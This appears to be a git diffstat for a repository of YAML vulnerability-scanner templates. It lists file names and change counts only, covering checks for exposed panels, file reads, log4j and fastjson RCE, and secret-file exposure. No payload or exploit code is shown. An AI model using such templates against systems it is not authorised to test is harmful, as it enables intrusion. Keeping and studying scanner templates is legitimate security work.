poc/other/d-link-wireless-7048.yaml | 6 +- poc/other/d-link-wireless-7050.yaml | 24 + poc/other/dead-host-with-cname-6786.yaml | 23 + poc/other/defectdojo-panel.yaml | 16 +- ...low.yaml => dell-idrac-workflow-6947.yaml} | 0 poc/other/deprecated-tls-6958.yaml | 25 + poc/other/deprecated-tls.yaml | 36 +- poc/other/development-logs-6987.yaml | 45 - poc/other/development-logs.yaml | 6 +- poc/other/diaowen-fileread.yaml | 19 + poc/other/dlink-850l-info-leak-7037.yaml | 12 +- .../dns-value-share-template-3.yaml} | 0 poc/other/domcfg-page-7077.yaml | 25 - poc/other/domcfg-page.yaml | 15 +- poc/other/dropbox.yaml | 13 +- poc/other/druid-monitor-7104.yaml | 5 +- poc/other/druid-monitor.yaml | 16 +- poc/other/ds-store-file.yaml | 36 - poc/other/ds_store-7119.yaml | 29 + poc/other/ds_store.yaml | 37 +- poc/other/dss-download-fileread-7116.yaml | 20 +- .../dynamic-broadcast-receiver-7140.yaml | 16 - .../dynamic-broadcast-receiver-7141.yaml | 16 - poc/other/dynamic-broadcast-receiver.yaml | 14 +- poc/other/ecology-getshell.yaml | 6 +- poc/other/elmah-log-file.yaml | 27 +- poc/other/envision-gateway-7227.yaml | 10 +- poc/other/envision-gateway.yaml | 22 + poc/other/epson-wf-series-7244.yaml | 27 + poc/other/epson-wf-series.yaml | 23 - poc/other/error-logs-7251.yaml | 59 - poc/other/eyelock-nano-lfd-7376.yaml | 21 + poc/other/eyelock-nano-lfd-7377.yaml | 9 +- poc/other/eyelock-nano-lfd.yaml | 24 + poc/other/f-secure-policy-manager-7563.yaml | 24 + poc/other/f-secure-policy-manager.yaml | 12 +- poc/other/fatpipe-ipvpn-panel.yaml | 12 +- poc/other/file-scheme-7469.yaml | 15 + poc/other/filezilla-7471.yaml | 13 +- poc/other/fiorilaunchpad-logon.yaml | 19 +- poc/other/firebase-urls-7497.yaml | 8 +- poc/other/firebase-urls-7498.yaml | 2 +- poc/other/firebase-urls-7499.yaml | 23 + ...l-7508.yaml => flightpath-panel-7507.yaml} | 0 poc/other/fortimail-panel-7532.yaml | 6 +- poc/other/fortimail-panel.yaml | 18 +- poc/other/fortinet-fortigate-panel-7533.yaml | 29 - poc/other/fortinet-fortigate-panel-7536.yaml | 20 - .../foulenzer-subdomain-tk (copy 1).yaml | 387 + poc/other/gSOAP-LFl.yaml | 15 +- poc/other/ganglia-xml-grid-monitor-7573.yaml | 14 +- poc/other/globalprotect-panel-7721.yaml | 18 +- poc/other/glpidirectorylisting(1).yaml | 56 + poc/other/glpidirectorylisting.yaml | 47 + poc/other/go-anywhere-client.yaml | 15 +- poc/other/gogs-workflow-7760.yaml | 11 - poc/other/gogs-workflow.yaml | 11 + poc/other/gradle-enterprise-panel.yaml | 28 +- poc/other/hanming-lfr-7879.yaml | 13 +- poc/other/hanming-lfr-7880.yaml | 13 +- poc/other/haproxy-status-7883.yaml | 19 - poc/other/haproxy-status-7885.yaml | 23 +- poc/other/heatmiser-wifi-thermostat-7924.yaml | 10 +- poc/other/heatmiser-wifi-thermostat.yaml | 22 - poc/other/heroku.yaml | 27 +- poc/other/hikvision-info-leak-7958.yaml | 34 + poc/other/hikvision-info-leak.yaml | 21 - poc/other/hitron-technologies-7961.yaml | 25 - poc/other/hitron-technologies-7962.yaml | 24 + poc/other/hitron-technologies.yaml | 18 +- .../hjtcloud-arbitrary-file-read-7968.yaml | 9 +- .../hjtcloud-arbitrary-file-read-7970.yaml | 24 +- ...jtcloud-rest-arbitrary-file-read-7973.yaml | 18 +- ...jtcloud-rest-arbitrary-file-read-7975.yaml | 9 +- poc/other/hmc-hybris-panel.yaml | 15 +- poc/other/home-assistant-7980.yaml | 16 + .../honeywell-building-control-7988.yaml | 8 +- poc/other/honeywell-building-control.yaml | 9 +- poc/other/hp-ilo-5-8018.yaml | 32 - poc/other/hp-ilo-5.yaml | 16 +- poc/other/hp-service-manager-8032.yaml | 3 +- poc/other/hp-service-manager-8034.yaml | 7 +- poc/other/hsort-fileRead.yaml | 3 - poc/other/huawei-hg532e-panel-8065.yaml | 30 + poc/other/huawei-hg532e-panel-8066.yaml | 9 +- poc/other/huawei-home-gateway.yaml | 9 +- poc/other/huijietong-cloud-fileread-8085.yaml | 36 - poc/other/huijietong-cloud-fileread-8086.yaml | 23 - poc/other/huijietong-cloud-fileread-8087.yaml | 6 +- ...aml => identity-services-engine-8144.yaml} | 0 poc/other/iis-shortname-8151.yaml | 55 + poc/other/interlib-fileread-8173.yaml | 22 +- poc/other/interlib-fileread-8174.yaml | 7 +- poc/other/internet-service-8177.yaml | 3 +- poc/other/internet-service.yaml | 22 + poc/other/ioncube-loader-wizard-8184.yaml | 35 - poc/other/ioncube-loader-wizard.yaml | 22 + poc/other/iptime-router.yaml | 21 +- poc/other/ixcache-panel.yaml | 22 +- poc/other/jaeger-ui-dashboard.yaml | 9 +- poc/other/jamf-panel-8216.yaml | 28 + poc/other/jamf-panel-8217.yaml | 8 +- poc/other/jamf-panel.yaml | 19 +- poc/other/jfrog-8303.yaml | 19 + poc/other/jfrog-8306.yaml | 20 - poc/other/jkstatus-manager-8344.yaml | 18 + poc/other/jkstatus-manager-8346.yaml | 30 +- poc/other/jmx-console-8351.yaml | 1 - poc/other/jmx-console-8353.yaml | 15 - poc/other/jolokia-list-8360.yaml | 28 - poc/other/jolokia-list-8361.yaml | 5 +- poc/other/jupyter-notebook-8406.yaml | 21 +- poc/other/jupyter-notebook-8407.yaml | 24 + poc/other/keo-klr300n-install.yaml | 39 - ...52.yaml => kerio-connect-client-8450.yaml} | 0 poc/other/klr300n-installer.yaml | 36 + poc/other/kubelet-healthz-8518.yaml | 1 - poc/other/kubelet-healthz-8519.yaml | 34 + poc/other/kubelet-healthz.yaml | 28 + poc/other/kubelet-metrics-8520.yaml | 9 +- poc/other/kubelet-metrics-8521.yaml | 7 +- poc/other/kubelet-pods-8523.yaml | 8 +- poc/other/kubelet-pods.yaml | 22 - poc/other/kubelet-runningpods-8525.yaml | 10 +- poc/other/lacie-panel.yaml | 23 +- ...ugin-d41d8cd98f00b204e9800998ecf8427e.yaml | 58 + poc/other/leostream-panel-8610.yaml | 22 - poc/other/liveview-axis-camera-8647.yaml | 56 +- ...ra-8646.yaml => liveview-axis-camera.yaml} | 0 poc/other/local-file-inclusion.yaml | 69 +- poc/other/loqate.yaml | 8 +- poc/other/lotus-domino-version-8654.yaml | 64 +- poc/other/lucee-stack-trace.yaml | 8 +- poc/other/mailchimp.yaml | 12 +- poc/other/mailgun.yaml | 26 +- poc/other/manage-engine-admanager-panel.yaml | 2 - poc/other/manageengine-adaudit-8730.yaml | 20 - poc/other/manageengine-adaudit.yaml | 3 +- .../manageengine-adselfservice-8736.yaml | 7 +- .../manageengine-adselfservice-8738.yaml | 24 + poc/other/manageengine-analytics.yaml | 10 +- .../manageengine-apex-helpdesk-8747.yaml | 20 + .../manageengine-apex-helpdesk-8748.yaml | 19 - poc/other/manageengine-apex-helpdesk.yaml | 19 +- ...anageengine-applications-manager-8751.yaml | 24 - ...anageengine-applications-manager-8753.yaml | 19 + poc/other/manageengine-desktop-8761.yaml | 24 + poc/other/manageengine-desktop-8763.yaml | 19 - poc/other/manageengine-desktop.yaml | 19 +- poc/other/manageengine-opmanager.yaml | 16 +- poc/other/manageengine-servicedesk-8771.yaml | 23 + .../manageengine-supportcenter-8775.yaml | 4 +- .../manageengine-supportcenter-8776.yaml | 20 + poc/other/mapbox.yaml | 15 +- ...her-with-or.yaml => matcher-with-and.yaml} | 0 poc/other/memcached-stats-8799.yaml | 26 - poc/other/memcached-stats.yaml | 17 + poc/other/metabase-panel.yaml | 20 +- poc/other/metadata-alibaba.yaml | 60 +- poc/other/metadata-azure-8813.yaml | 16 +- poc/other/metadata-azure-8815.yaml | 46 - poc/other/metadata-hetzner-8822.yaml | 42 - poc/other/metadata-hetzner-8823.yaml | 9 +- poc/other/metadata-hetzner-8824.yaml | 46 + poc/other/metadata-openstack-8828.yaml | 9 +- poc/other/metadata-openstack.yaml | 35 - poc/other/metadata-service-alibaba.yaml | 29 - poc/other/mikrotik-graph-8870.yaml | 20 - poc/other/mikrotik-graph-8871.yaml | 20 + poc/other/mikrotik-graph.yaml | 6 +- poc/other/mikrotik-routeros-8873.yaml | 21 + poc/other/mikrotik-routeros-8875.yaml | 22 - poc/other/mikrotik-routeros-8876.yaml | 6 +- poc/other/minecraft-enum.yaml | 43 + .../{mobileiron.yaml => mobileiron(1).yaml} | 0 poc/other/moodle-changelog-8934.yaml | 26 - poc/other/moodle-changelog-8936.yaml | 26 + poc/other/moodle-changelog.yaml | 13 +- poc/other/nagios-status-page-8996.yaml | 18 - poc/other/nagios-status-page-8997.yaml | 23 +- poc/other/neos-panel.yaml | 22 +- poc/other/nerdgraph.yaml | 13 +- poc/other/nessus-panel-9017.yaml | 23 + poc/other/nessus-panel-9019.yaml | 7 +- poc/other/nessus-panel-9020.yaml | 25 - poc/other/netflix-conductor-ui.yaml | 27 +- poc/other/netis-info-leak-9034.yaml | 8 +- poc/other/netis-info-leak.yaml | 31 - poc/other/netrc-9045.yaml | 38 - poc/other/netrc-9046.yaml | 9 +- poc/other/netscaler-gateway-9054.yaml | 12 +- poc/other/netscaler-gateway-9055.yaml | 14 + poc/other/netscaler-gateway.yaml | 19 +- poc/other/nextcloud-install-9082.yaml | 3 +- poc/other/nextcloud-install-9084.yaml | 25 + poc/other/nextcloud-install-9085.yaml | 28 - poc/other/niagara-fox-info-enum.yaml | 39 - poc/other/niagara-fox-protocol-enum.yaml | 41 + poc/other/nifi-detech-9130.yaml | 15 +- poc/other/nifi-detech-9131.yaml | 29 + poc/other/nifi-detech-9132.yaml | 3 - poc/other/nomad-jobs.yaml | 33 - poc/other/ns-asg-file-read-9151.yaml | 40 + poc/other/ns-asg-file-read-9152.yaml | 24 +- poc/other/ntlm-directories-9155.yaml | 74 + poc/other/ntlm-directories-9156.yaml | 75 - poc/other/ntlm-directories-9158.yaml | 120 +- poc/other/nuuo-file-inclusion-9169.yaml | 10 +- poc/other/nuuo-file-inclusion.yaml | 24 - poc/other/officedocuments.yaml | 11 +- poc/other/oki-data-9226.yaml | 3 +- poc/other/okta-panel-9231.yaml | 3 +- poc/other/okta-panel.yaml | 15 +- poc/other/old-copyright-9236.yaml | 6 +- poc/other/old-copyright-9238.yaml | 40 +- poc/other/open-game-panel.yaml | 23 +- poc/other/open-mjpg-streamer-9283.yaml | 32 + poc/other/open-mjpg-streamer-9284.yaml | 4 + poc/other/open-proxy-internal-9289.yaml | 111 - poc/other/open-proxy-internal-9290.yaml | 134 + poc/other/open-proxy-localhost-9291.yaml | 23 +- poc/other/open-proxy-localhost-9293.yaml | 59 - poc/other/open-proxy-portscan-9295.yaml | 62 - ...pen-virtualization-manager-panel-9327.yaml | 38 + ...pen-virtualization-manager-panel-9328.yaml | 39 - poc/other/openam-workflow-9258.yaml | 11 + ...orkflow-9259.yaml => openam-workflow.yaml} | 0 poc/other/opensis-panel.yaml | 18 +- poc/other/openvpn-monitor.yaml | 24 +- poc/other/openweather.yaml | 24 +- poc/other/otobo-panel-9412.yaml | 3 +- .../pacs-connexion-utilisateur-9426.yaml | 20 - poc/other/pagerduty.yaml | 16 +- ....yaml => pagespeed-global-admin-9433.yaml} | 0 poc/other/pagespeed-global-admin.yaml | 22 +- poc/other/panabit-panel-9445.yaml | 3 +- poc/other/panabit-panel.yaml | 22 +- .../panasonic-network-management-9447.yaml | 5 +- .../panasonic-network-management-9448.yaml | 21 - ...=> panasonic-network-management-9450.yaml} | 0 poc/other/parallels-html-client-9462.yaml | 3 +- poc/other/pendo.yaml | 17 +- ...anel-9481.yaml => pentaho-panel-9483.yaml} | 0 poc/other/pentaho-panel.yaml | 17 +- poc/other/phoronix-pane.yaml | 14 +- poc/other/phoronix-pane;.yaml | 31 + poc/other/pivotaltracker.yaml | 5 - poc/other/plesk-obsidian-9594.yaml | 24 - poc/other/plesk-onyx-9598.yaml | 19 + poc/other/plesk-onyx-9601.yaml | 20 - poc/other/plesk-stat-9604.yaml | 3 +- poc/other/portainer-init-deploy-9628.yaml | 8 +- .../postmessage-outgoing-tracker-9636.yaml | 64 + poc/other/postmessage-outgoing-tracker.yaml | 66 + poc/other/postmessage-tracker-9639.yaml | 63 - poc/other/postmessage-tracker.yaml | 47 +- poc/other/powerlogic-ion-9648.yaml | 19 + poc/other/powerlogic-ion-9650.yaml | 20 - poc/other/powerlogic-ion.yaml | 24 +- poc/other/printers-info-leak.yaml | 18 +- poc/other/prometheus-exporter-9677.yaml | 25 + ...ter-9678.yaml => prometheus-exporter.yaml} | 0 poc/other/prometheus-flags-9687.yaml | 42 + poc/other/prometheus-flags.yaml | 31 - poc/other/prometheus-targets-9692.yaml | 18 +- ...gets-9690.yaml => prometheus-targets.yaml} | 0 poc/other/promothoues-panel (copy 1).yaml | 16 + poc/other/promothoues-panel.yaml | 9 +- poc/other/prototype-pollution-check-9697.yaml | 94 - poc/other/prototype-pollution-check-9698.yaml | 95 + poc/other/prototype-pollution-check.yaml | 135 +- poc/other/provider-path-9701.yaml | 3 - poc/other/ptr-fingerprint-9707.yaml | 6 +- poc/other/ptr.yaml | 22 + poc/other/pulse-secure-panel-9712.yaml | 12 +- poc/other/pulse-secure-panel-9714.yaml | 23 - poc/other/puppetboard-panel.yaml | 40 +- poc/other/put-m-enb.yaml | 30 +- ...bled.yaml => put-method-enabled-9726.yaml} | 0 poc/other/pypicloud-panel-9734.yaml | 11 +- poc/other/pypicloud-panel.yaml | 19 +- ...eak-9754.yaml => qdpm-info-leak-9750.yaml} | 0 poc/other/qdpm-info-leak.yaml | 29 + .../{race-multiple.yaml => race-simple.yaml} | 0 poc/other/rack-mini-profiler-9792.yaml | 18 - poc/other/rack-mini-profiler-9793.yaml | 15 +- poc/other/radius-manager-9795.yaml | 23 + poc/other/radius-manager-9796.yaml | 22 - poc/other/radius-manager.yaml | 5 +- poc/other/rancher-panel.yaml | 31 +- poc/other/rdf-user-enumeration.yaml | 10 +- poc/other/request-based-interaction-9862.yaml | 62 - poc/other/resin-viewfile-lfr-9872.yaml | 6 +- poc/other/resin-viewfile-lfr-9874.yaml | 31 + poc/other/robots-txt-9886.yaml | 23 + poc/other/rsa-self-service-9910.yaml | 23 + poc/other/rsa-self-service-9912.yaml | 23 - poc/other/scs-landfill-control-10097.yaml | 24 - poc/other/scs-landfill-control-10098.yaml | 23 + poc/other/securenvoy-panel-10114.yaml | 19 - poc/other/securenvoy-panel-10116.yaml | 19 + poc/other/securepoint-utm-10117.yaml | 27 + poc/other/securepoint-utm-10118.yaml | 32 - poc/other/securepoint-utm.yaml | 5 + poc/other/security-10123.yaml | 25 + poc/other/selea-ip-camera-10134.yaml | 29 - poc/other/sendgrid.yaml | 13 +- poc/other/server-status-localhost-10166.yaml | 22 - poc/other/servfail-refused-hosts-10168.yaml | 5 +- poc/other/servfail-refused-hosts-10169.yaml | 6 +- poc/other/servfail-refused-hosts-10170.yaml | 17 - poc/other/shell-history-10191.yaml | 39 - poc/other/shell-history-10192.yaml | 46 + poc/other/shell-history-10193.yaml | 19 +- poc/other/shell_scripts.yaml | 41 - poc/other/shellscripts.yaml | 40 +- poc/other/shoutcast-server.yaml | 18 +- poc/other/signatures-10268.yaml | 2170 - poc/other/signatures.yaml | 75682 +--------------- poc/other/sitecore-version-10291.yaml | 29 +- ...rsion-10292.yaml => sitecore-version.yaml} | 0 poc/other/sitecore-workflow-10293.yaml | 6 +- poc/other/sitecore.yaml | 51 +- poc/other/skycaiji-admin-panel-10304.yaml | 27 - poc/other/skycaiji-admin-panel-10306.yaml | 27 + poc/other/skycaiji-admin-panel.yaml | 20 +- poc/other/skycaiji-install-10309.yaml | 13 +- ...stall-10307.yaml => skycaiji-install.yaml} | 0 poc/other/slack.yaml | 10 +- poc/other/solarwinds-orion-10359.yaml | 4 +- poc/other/solarwinds-orion.yaml | 20 +- poc/other/solr-query-dashboard-10368.yaml | 12 +- poc/other/solr-query-dashboard.yaml | 25 + .../sonarqube-public-projects-10377.yaml | 23 - .../sonarqube-public-projects-10379.yaml | 24 + poc/other/sonarqube-public-projects.yaml | 13 +- ... => sonicwall-management-panel-10385.yaml} | 0 poc/other/sonicwall-sslvpn-panel-10388.yaml | 14 - poc/other/sonicwall-sslvpn-panel-10390.yaml | 14 + poc/other/sonicwall-sslvpn-panel.yaml | 24 +- .../sonicwall-sslvpn-shellshock-10393.yaml | 12 +- .../sonicwall-sslvpn-shellshock-10395.yaml | 27 - ...spidercontrol-scada-server-info-10413.yaml | 38 + poc/other/splunk-enterprise-panel-10414.yaml | 8 +- poc/other/splunk-enterprise-panel-10415.yaml | 31 - .../spoofable-spf-records-ptr-10424.yaml | 1 - .../spoofable-spf-records-ptr-10427.yaml | 19 - poc/other/sugarcrm-panel-10569.yaml | 23 + poc/other/sugarcrm-panel-10571.yaml | 3 +- poc/other/supervpn-panel-10577.yaml | 16 +- .../symantec-messaging-gateway-10607.yaml | 19 - poc/other/symantec-messaging-gateway.yaml | 7 +- ...10626.yaml => symfony-profiler-10627.yaml} | 0 poc/other/tableau-panel-10641.yaml | 21 + poc/other/tableau-panel-10642.yaml | 25 - poc/other/tectuus-scada-monitor-10681.yaml | 10 +- poc/other/tekon-info-leak-10684.yaml | 9 +- ...o-leak-10685.yaml => tekon-info-leak.yaml} | 0 poc/other/teradici-pcoip-10702.yaml | 10 +- poc/other/teradici-pcoip-10704.yaml | 13 +- .../terraform-enterprise-panel-10712.yaml | 14 +- poc/other/terraform-enterprise-panel.yaml | 19 +- poc/other/thinkCMF_include.yaml | 2 - ...inkcmf-arbitrary-code-execution-10715.yaml | 29 + .../thinkcmf-arbitrary-code-execution.yaml | 23 - poc/other/thinkcmf-workflow-10730.yaml | 11 - poc/other/thinkcmf-workflow-10731.yaml | 2 +- poc/other/thinkcmf_include.yaml | 22 + poc/other/tianqing-info-leak.yaml | 11 +- poc/other/tileserver-gl-10786.yaml | 33 - poc/other/tileserver-gl.yaml | 29 + poc/other/tinypng.yaml | 4 - poc/other/tor-socks-proxy-10811.yaml | 20 - poc/other/tor-socks-proxy-10812.yaml | 1 - poc/other/trace-method-10827.yaml | 12 +- poc/other/trace-method-10828.yaml | 5 + poc/other/travisci.yaml | 12 +- .../tuxedo-connected-controller-10852.yaml | 20 + .../tuxedo-connected-controller-10853.yaml | 20 - poc/other/tuxedo-connected-controller.yaml | 22 +- poc/other/txt-fingerprint-10863.yaml | 31 + poc/other/txt-fingerprint.yaml | 18 - poc/other/ups-status-10985.yaml | 21 + ...{ups-status-10983.yaml => ups-status.yaml} | 0 poc/other/versa-sdwan.yaml | 18 +- poc/other/wago-plc-panel-11091.yaml | 22 - poc/other/wago-plc-panel-11093.yaml | 22 + poc/other/wago-plc-panel.yaml | 19 +- poc/other/wakatime.yaml | 25 +- .../wallix-accessmanager-panel-11094.yaml | 29 - .../wallix-accessmanager-panel-11095.yaml | 30 + poc/other/wallix-accessmanager-panel.yaml | 22 +- poc/other/wazuh-panel-11114.yaml | 3 +- poc/other/wazuh-panel.yaml | 13 +- poc/other/weatherlink-11117.yaml | 3 +- poc/other/weatherlink.yaml | 22 +- poc/other/weglot.yaml | 15 +- poc/other/wireless-leakage.yaml | 20 + poc/other/wooyun-2015-148227(1).yaml | 39 + poc/other/wooyun-2015-148227-11227.yaml | 16 +- poc/other/workspace-one-uem-11391.yaml | 2 +- poc/other/wso2-2019-0598-11636.yaml | 36 - poc/other/wso2mgmtconsole.yaml | 31 + poc/other/xds-amr-status-11668.yaml | 26 + poc/other/xds-amr-status-11669.yaml | 31 - poc/other/xds-amr-status.yaml | 14 +- poc/other/xprober-service-11694.yaml | 19 +- poc/other/xprober-service-11695.yaml | 22 +- poc/other/xxljob-panel.yaml | 25 +- poc/other/yarn-lock-11728.yaml | 25 +- .../{yarn-lock.yaml => yarn-lock-11730.yaml} | 0 poc/other/yopass-panel-11749.yaml | 16 - poc/other/yopass-panel-11750.yaml | 16 + poc/other/yopass-panel.yaml | 4 +- poc/other/zabbix-dashboards-access-11754.yaml | 24 - poc/other/zabbix-dashboards-access-11757.yaml | 28 + poc/other/zabbix-dashboards-access.yaml | 18 +- poc/other/zabbix-error-11764.yaml | 3 +- poc/other/zabbix-error-11766.yaml | 16 +- poc/other/zhiyuan-oa-info-leak-11797.yaml | 5 +- poc/other/zhiyuan-oa-info-leak-11799.yaml | 23 - ...k.yaml => zhiyuan-oa-info-leak-11800.yaml} | 0 poc/other/zhongkewangwei-fileread.yaml | 20 - poc/other/zte-panel-11840.yaml | 34 + poc/other/zte-panel-11841.yaml | 21 - poc/other/zte-panel.yaml | 18 +- poc/perl/perl-status-9486.yaml | 19 +- poc/perl/perl-status-9487.yaml | 16 + poc/php/clockwork-php-page-1016.yaml | 22 - ...1018.yaml => clockwork-php-page-1019.yaml} | 0 ...s-9497.yaml => php-backup-files-9498.yaml} | 0 poc/php/php-backup-files.yaml | 127 +- poc/php/php-debug-bar-9506.yaml | 6 +- poc/php/php-debug-bar-9507.yaml | 30 + poc/php/php-errors-9509.yaml | 8 +- poc/php/php-errors-9512.yaml | 15 +- poc/php/php-fpm-config-9514.yaml | 34 + poc/php/php-fpm-config.yaml | 20 - poc/php/php-fpm-status-9516.yaml | 14 +- poc/php/php-proxy-detect-9545.yaml | 26 - poc/php/php-proxy-detect.yaml | 26 + poc/php/php-timeclock-xss-9550.yaml | 27 + ...k-xss-9553.yaml => php-timeclock-xss.yaml} | 0 poc/php/php-user-ini-disclosure-9561.yaml | 4 + poc/php/php-warning-9562.yaml | 25 - poc/php/php-warning.yaml | 18 +- poc/php/php-zerodium-backdoor-rce-9569.yaml | 19 + poc/php/php-zerodium-backdoor-rce-9570.yaml | 3 +- poc/php/php-zerodium-backdoor-rce-9572.yaml | 16 +- poc/php/phpcollab-detect-9499.yaml | 21 + poc/php/phpcollab-detect-9501.yaml | 25 - poc/php/phpcollab-detect.yaml | 4 + poc/php/phpcollab-workflow-9502.yaml | 2 +- poc/php/phpcollab-workflow.yaml | 11 + .../{phpinfo-files.yaml => phpinfo-9521.yaml} | 0 ...l-9525.yaml => phpmyadmin-panel-9526.yaml} | 0 poc/php/phpmyadmin-setup(1).yaml | 33 - poc/php/phpmyadmin-setup-9531.yaml | 36 + poc/php/phpmyadmin-setup-9532.yaml | 8 +- poc/php/phpmyadmin-setup.yaml | 26 +- poc/php/phpmyadmin-sql-9534.yaml | 1 - poc/php/phpmyadmin-sql-9535.yaml | 31 - poc/php/phpmyadmin-sql-9536.yaml | 24 + poc/php/phpok-sqli-9538.yaml | 17 +- poc/php/phppgadmin-panel-9539.yaml | 11 +- poc/php/phppgadmin-panel-9541.yaml | 25 + poc/php/phppgadmin-panel-9542.yaml | 10 +- poc/php/{phpunit.yaml => phpunit-9556.yaml} | 0 poc/php/phpunit-9557.yaml | 20 - poc/php/phpunit-9558.yaml | 12 +- poc/php/phpwiki-lfi-9568.yaml | 8 +- poc/php/phpwiki-lfi.yaml | 21 - poc/php/ruijie-phpinfo-9951.yaml | 22 + poc/php/ruijie-phpinfo-9952.yaml | 20 +- poc/php/ruijie-phpinfo-9953.yaml | 3 +- poc/php/thinkphp-2-rce-10738.yaml | 23 - poc/php/thinkphp-2-rce-10740.yaml | 27 + poc/php/thinkphp-2-rce-10741.yaml | 1 + poc/php/thinkphp-501-rce-10743.yaml | 39 + poc/php/thinkphp-501-rce.yaml | 24 - poc/php/thinkphp-5022-rce-10746.yaml | 14 +- ...kphp-509-information-disclosure-10753.yaml | 25 + .../thinkphp-509-information-disclosure.yaml | 21 +- poc/php/weiphp-sql-injection-11190.yaml | 11 +- poc/php/wp-phpfreechat-xss-11525.yaml | 29 + poc/php/wp-phpfreechat-xss-11528.yaml | 8 +- poc/python/autobahn-python-detect-594.yaml | 30 + poc/python/autobahn-python-detect-595.yaml | 8 +- poc/python/default-django-page-6841.yaml | 6 +- ...age-6840.yaml => default-django-page.yaml} | 0 poc/python/django-admin-panel-7021.yaml | 18 - poc/python/django-admin-panel-7023.yaml | 18 + poc/python/django-admin-panel.yaml | 18 +- poc/python/django-debug-detect-7026.yaml | 21 - poc/python/django-debug-exposure-csrf.yaml | 17 +- .../{django-debug.yml => django-debug.yaml} | 0 .../django-framework-exceptions-7033.yaml | 7 +- .../django-framework-exceptions-7034.yaml | 3 +- poc/python/django-secret-key.yaml | 31 + poc/python/django-secret.key.yaml | 62 - poc/python/jupyter-ipython-unauth-8402.yaml | 21 + poc/python/jupyter-ipython-unauth-8405.yaml | 20 +- .../python-app-sql-exceptions-9744.yaml | 26 - poc/python/python-app-sql-exceptions.yaml | 20 + poc/python/python-metrics-9747.yaml | 33 + poc/rabbitmq/rabbitmq-default-admin-9782.yaml | 4 +- poc/rabbitmq/rabbitmq-default-login-9786.yaml | 32 - poc/rabbitmq/rabbitmq-default-login.yaml | 36 - poc/redis/exposed-redis-7336.yaml | 31 - poc/redis/exposed-redis-7337.yaml | 7 +- .../Apache-NiFi-rce.yaml | 2 - .../RCE-CVE-2021-41773.yaml | 70 +- poc/remote_code_execution/SPON-IP-rce.yaml | 7 +- poc/remote_code_execution/SymfonyRCE.yaml | 4 + .../apache-flink-unauth-rce-355.yaml | 23 +- .../apache-flink-unauth-rce-356.yaml | 39 + .../apache-nifi-rce.yaml | 36 + .../apache-ofbiz-log4j-rce-366.yaml | 33 - .../apache-ofbiz-log4j-rce.yaml | 28 + .../apache-solr-log4j-rce-372.yaml | 36 - .../apache-solr-log4j-rce.yaml | 63 +- .../cisco-cloudcenter-suite-log4j-rce.yaml | 63 + .../cisco-cloudcenter-suite-rce.yaml | 73 - ...ml => clockwatch-enterprise-rce-1010.yaml} | 0 .../code42-log4j-rce.yaml | 36 - .../core-chuangtian-cloud-rce-1207.yaml | 33 + .../core-chuangtian-cloud-rce-1209.yaml | 21 +- .../core-chuangtian-cloud-rce-1211.yaml | 38 - .../core-chuangtian-cloud-rce.yaml | 30 +- .../custom-datadump-source-code-detect.yaml | 3 +- .../elex-woocommerce-xss-7200.yaml | 48 - .../elex-woocommerce-xss.yaml | 42 - .../eyou-email-rce-7378.yaml | 28 + .../eyou-email-rce-7380.yaml | 7 +- .../fastjson-1-2-41-rce-7404.yaml | 9 +- .../fastjson-1-2-41-rce.yaml | 31 + .../fastjson-1-2-43-rce-7411.yaml | 17 +- .../fastjson-1-2-43-rce-7412.yaml | 12 +- .../fastjson-1-2-47-rce-7415.yaml | 53 + .../fastjson-1-2-62-rce-7419.yaml | 17 +- .../fastjson-1-2-62-rce-7420.yaml | 9 +- .../fastjson-1-2-67-rce-7423.yaml | 17 +- .../fastjson-1-2-67-rce.yaml | 33 + .../fastjson-1-2-68-rce-7425.yaml | 55 - .../fastjson-1-2-68-rce.yaml | 19 +- .../forcepoint-applicance.yaml | 11 +- poc/remote_code_execution/forcepoint.yaml | 14 +- .../gitlab-rce-7693.yaml | 16 +- poc/remote_code_execution/gitlab-rce.yaml | 56 + .../h3c-imc-rce-7868.yaml | 21 + .../h3c-imc-rce-7870.yaml | 35 +- .../h3c-imc-rce-7871.yaml | 15 +- .../hashicorp-consul-rce-7890.yaml | 25 +- .../hashicorp-consul-rce-7891.yaml | 29 + .../hashicorp-consul-rce-7893.yaml | 15 +- ...e.yaml => icewarp-webclient-rce-8129.yaml} | 0 .../icewarp-webclient-rce-8133.yaml | 7 +- .../jamf-log4j-jndi-rce-8211.yaml | 21 +- .../jamf-log4j-jndi-rce-8214.yaml | 32 +- .../lotuscms-rce-8651.yaml | 3 +- ...s-rce-8652.yaml => lotuscms-rce-8653.yaml} | 0 .../maian-cart-preauth-rce-8721.yaml | 51 + .../maian-cart-preauth-rce.yaml | 15 +- .../mcafee-epo-rce-8790.yaml | 5 +- ...rce-8793.yaml => mcafee-epo-rce-8794.yaml} | 0 .../metersphere-plugin-rce-8835.yaml | 11 +- .../metersphere-plugin-rce.yaml | 52 + .../mirai-unknown-rce-8899.yaml | 34 - .../mirai-unknown-rce.yaml | 29 + .../mobileiron-log4j-jndi-rce.yaml | 14 +- .../natshell-rce-9009.yaml | 38 + poc/remote_code_execution/natshell-rce.yaml | 21 - .../netgear-wnap320-rce.yaml | 3 - poc/remote_code_execution/netterce.yaml | 8 +- .../nuuo-nvrmini2-rce-9171.yaml | 23 + .../nuuo-nvrmini2-rce-9173.yaml | 16 +- .../optilink-ont1gew-gpon-rce-9343.yaml | 31 + ...42.yaml => optilink-ont1gew-gpon-rce.yaml} | 0 .../oscommerce-rce-9405.yaml | 30 + .../oscommerce-rce-9408.yaml | 7 +- ...erce-rce-9407.yaml => oscommerce-rce.yaml} | 0 .../pdf-signer-ssti-to-rce-9470.yaml | 20 + .../pdf-signer-ssti-to-rce-9471.yaml | 3 +- .../phalcon-framework-source-9495.yaml | 11 +- .../phalcon-framework-source-9496.yaml | 25 + .../php-zerodium-backdoor-rce-9569.yaml | 19 + .../php-zerodium-backdoor-rce-9570.yaml | 3 +- .../php-zerodium-backdoor-rce-9572.yaml | 16 +- .../powercreator-cms-rce-9643.yaml | 4 + .../powercreator-cms-rce-9644.yaml | 50 + .../powercreator-cms-rce-9646.yaml | 40 - ...ang-next-generation-firewall-rce-9761.yaml | 26 - ...netkang-next-generation-firewall-rce.yaml} | 0 ... => qvisdvr-deserialization-rce-9772.yaml} | 0 .../qvisdvr-deserialization-rce-9773.yaml | 8 - .../qvisdvr-deserialization-rce-9774.yaml | 45 - .../rce-cve-2021-41773.yaml | 16 + .../rce-shellshock-user-agent-9832.yaml | 6 +- .../rconfig-rce-9834.yaml | 61 - .../ruijie-EWEB-rce.yaml | 5 +- .../ruijie-eg-rce-9925.yaml | 5 +- .../ruijie-eg-rce-9926.yaml | 56 - 